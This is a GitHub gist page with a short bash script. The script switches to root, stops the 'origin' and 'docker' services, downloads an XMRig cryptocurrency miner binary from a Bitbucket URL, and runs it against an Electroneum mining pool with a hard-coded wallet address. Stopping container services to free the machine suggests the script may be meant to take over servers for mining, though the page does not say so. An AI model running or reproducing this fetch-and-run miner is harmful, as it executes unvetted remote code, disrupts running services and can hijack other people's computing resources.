Last active
March 8, 2018 16:54
-
-
Save haphan/ef31b8c35fc68190aef41aec941ffd2b to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| sudo su | |
| sysctl -w vm.nr_hugepages=16 | |
| systemctl stop origin | |
| systemctl stop docker | |
| mkdir -p /opt/mine && cd /opt/mine | |
| wget https://bitbucket.org/haphan/xmrig-free/downloads/xmrig-free | |
| chmod +x xmrig-free | |
| ./xmrig-free -o stratum+tcp://pool.etn.spacepools.org:3333 -u etnkLK5q9fTJTWJaHSJoU4XR6P7A22QbZLVW5KdJgzPP4oxRJVcGXC3XJY21qvvKmFjWf1xon6pT91hv53CnbWpy972ToQNfUV.5000@vm -p x --donate-level -0 -S |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment